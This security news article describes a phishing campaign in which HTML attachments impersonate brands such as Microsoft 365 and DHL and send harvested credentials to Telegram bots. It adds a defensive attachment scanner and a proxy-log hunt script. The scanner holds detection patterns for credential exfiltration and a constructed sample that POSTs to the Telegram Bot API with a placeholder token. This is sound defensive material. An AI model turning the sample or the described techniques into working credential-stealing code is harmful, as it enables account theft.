Cybercriminals Exploit Popular Brands in Sophisticated Phishing Campaign
A new phishing campaign has emerged, targeting organizations across Central and Eastern Europe by impersonating well-known global brands to trick users into surrendering their login credentials. The attack uses self-contained HTML files delivered as email attachments, so there is no externally hosted phishing page and no suspicious URL for reputation-based or URL-filtering controls to flag.
Once opened, these attachments present convincing fake login pages for brands including Microsoft 365, Adobe, WeTransfer, FedEx, and DHL, creating a seamless user experience designed to bypass conventional email security controls.
Attack Methodology
The attackers demonstrate a clear understanding of regional business practices. They distribute phishing emails posing as legitimate customers or business partners, requesting quotations or invoice confirmations, with RFQ-themed attachment names such as RFQ_4460-INQUIRY.HTML. This targeted approach focuses on industries with regular procurement workflows, including the agriculture, automotive, construction, and education sectors, primarily in the Czech Republic, Slovakia, Hungary, and Germany.
Cyble security analysts identified that the campaign's success relies on JavaScript embedded within the HTML attachments, which captures the entered credentials and transmits them directly to attacker-controlled Telegram bots rather than to a traditional command-and-control server. Upon opening the attachment, victims encounter a carefully replicated login interface with authentic-looking brand logos and styling over a blurred background image for added legitimacy.
Technical Analysis
The credential capture mechanism functions by reading form field values and constructing API requests to send stolen data directly through the Telegram Bot API. Technical analysis reveals two distinct implementation approaches among analyzed samples. The first variant implements CryptoJS AES encryption for obfuscation while capturing email addresses, passwords, IP addresses, and user-agent information before redirecting victims to legitimate company domains.
The second sample employs more advanced anti-analysis techniques, blocking keyboard combinations including F12, Ctrl+U/S/C/A/X, and the right-click context menu to hinder code inspection. Its exfiltration function uses the browser's native Fetch API rather than a jQuery dependency, which keeps the attachment self-contained and the code cleaner.
The JavaScript constructs POST requests containing the harvested credentials and sends them over HTTPS to api.telegram.org/bot endpoints, with the bot token and chat ID hardcoded in the script. Because the traffic goes to a legitimate, high-reputation domain over TLS, it blends in with ordinary web activity, while the use of Telegram bots rather than attacker-owned servers gives the operation resilient, easily replaced infrastructure.
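The indicators described above (an inline script in a standalone HTML file, a credential form, DevTools and context-menu blocking, CryptoJS AES, and a Fetch POST to api.telegram.org/bot with a hardcoded token) can be turned into a static pre-delivery check for HTML attachments. The following scanner is an added example written for this article, not code from Cyble or from the phishing kit; the indicator weights, thresholds, and the two sample attachments are constructed assumptions, and the sample's bot token is a placeholder.

```python
import re

# Static indicators drawn from the campaign description. Weights and thresholds are
# assumptions chosen for this example, not values from the report.
INDICATORS = {
    "telegram_bot_api":  (re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+", re.I), 6),
    "telegram_chat_id":  (re.compile(r"\bchat_id\b"), 2),
    "cryptojs_aes":      (re.compile(r"CryptoJS\.AES\.(encrypt|decrypt)"), 3),
    "devtools_blocking": (re.compile(r"keyCode\s*===?\s*123|\bkey\s*===?\s*['\"]F12['\"]", re.I), 3),
    "contextmenu_block": (re.compile(r"addEventListener\(\s*['\"]contextmenu['\"]", re.I), 2),
    "password_field":    (re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I), 2),
    "fetch_post":        (re.compile(r"fetch\s*\([\s\S]{0,300}?method\s*:\s*['\"]POST['\"]", re.I), 2),
    "inline_script":     (re.compile(r"<script(?![^>]*\bsrc=)[^>]*>", re.I), 1),
}


def scan_html(content: str) -> dict:
    """Return the matched indicator names, a weighted score, and any bot token found.

    The token is extracted because it is a reusable hunting IoC: the same token will
    appear in every attachment generated for that Telegram bot.
    """
    matched, score = [], 0
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(content):
            matched.append(name)
            score += weight
    token = None
    hit = INDICATORS["telegram_bot_api"][0].search(content)
    if hit:
        token = hit.group(0).split("/bot", 1)[1]
    return {"matched": matched, "score": score, "bot_token": token}


def verdict(score: int) -> str:
    """Map a score to a mail-gateway action (example thresholds)."""
    if score >= 10:
        return "block"
    if score >= 5:
        return "sandbox"
    return "allow"


# Constructed sample mimicking the described attachment: placeholder token, no real
# credential-harvesting logic, just the shape a scanner must recognise.
SUSPICIOUS_SAMPLE = """<html><body style="background:url(blur.jpg)">
<form id="login"><input name="email" type="email">
<input name="pwd" type="password"><button>Sign in</button></form>
<script>
document.addEventListener("contextmenu", e => e.preventDefault());
document.addEventListener("keydown", e => { if (e.keyCode === 123) e.preventDefault(); });
fetch("https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN/sendMessage", {
  method: "POST", body: JSON.stringify({ chat_id: "000000", text: "<redacted>" })
});
</script></body></html>"""

# Constructed benign attachment for comparison.
BENIGN_SAMPLE = """<html><body><h1>Quarterly newsletter</h1>
<p>See the attached PDF for details.</p></body></html>"""


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        result = scan_html(sample)
        print(label, verdict(result["score"]), result)
```

A gateway would run scan_html over every text/html (and .htm/.html) attachment before delivery; anything scored "sandbox" goes to detonation, and any extracted bot token is added to the proxy block list and searched for across the mail archive.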
Recommendations
Organizations should prioritize deploying HTML attachment controls and content inspection policies that block or sandbox potentially malicious HTML files before they reach end users. Security teams are advised to hunt for POST requests to api.telegram.org originating from client systems (ordinary Telegram clients do not use the Bot API path api.telegram.org/bot) and to run retroactive hunts for the identified indicators to determine whether any credentials have already been compromised.
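The proxy-log hunt recommended above, as an added example that is not part of the original article: it parses web-proxy records, keeps only POST requests from client subnets to the Telegram Bot API path, groups them by source host, and collects the bot tokens seen so they can be blocked and searched for in the mail archive. The log format, IP ranges, usernames, and tokens are constructed assumptions for this example.

```python
import re
from collections import defaultdict

# Constructed proxy log: timestamp, client IP, user, method, URL, HTTP status.
# Format and every value in it are example assumptions, not real telemetry.
PROXY_LOG = """\
2024-03-01T09:12:01Z 10.20.4.17 jnovak POST https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN/sendMessage 200
2024-03-01T09:12:05Z 10.20.4.17 jnovak GET https://login.microsoftonline.com/ 200
2024-03-01T09:15:44Z 10.20.4.31 kszabo POST https://api.telegram.org/bot1111111111:PLACEHOLDER_TOKEN/sendMessage 200
2024-03-01T09:20:10Z 10.20.9.2 mweber GET https://web.telegram.org/ 200
2024-03-01T10:01:00Z 10.20.4.17 jnovak POST https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN/sendMessage 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<user>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$"
)
# Bot API calls carry the token in the path; a normal Telegram client never uses this path.
BOT_API_RE = re.compile(
    r"^https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<call>\w+)", re.I
)

# Assumed client (workstation) subnets; server egress would be excluded separately.
CLIENT_PREFIXES = ("10.20.4.", "10.20.9.")


def hunt_telegram_exfil(log_text: str, client_prefixes=CLIENT_PREFIXES) -> dict:
    """Return {source_ip: [hit, ...]} for POSTs to the Telegram Bot API from client subnets."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"].upper() != "POST":
            continue
        if not m["src"].startswith(client_prefixes):
            continue
        api = BOT_API_RE.match(m["url"])
        if not api:
            continue
        hits[m["src"]].append(
            {"ts": m["ts"], "user": m["user"], "token": api["token"], "call": api["call"]}
        )
    return dict(hits)


def bot_tokens(hits: dict) -> list:
    """Unique bot tokens observed; each is an IoC to block and to search for in attachments."""
    return sorted({h["token"] for entries in hits.values() for h in entries})


if __name__ == "__main__":
    found = hunt_telegram_exfil(PROXY_LOG)
    for src, entries in found.items():
        users = sorted({e["user"] for e in entries})
        print(f"{src}: {len(entries)} Bot API POST(s) by {', '.join(users)}")
    print("tokens:", bot_tokens(found))
```

Each flagged host identifies a user whose credentials should be treated as compromised (password reset, session revocation, MFA review), and the mailbox of that user is where the retroactive search for the originating HTML attachment starts.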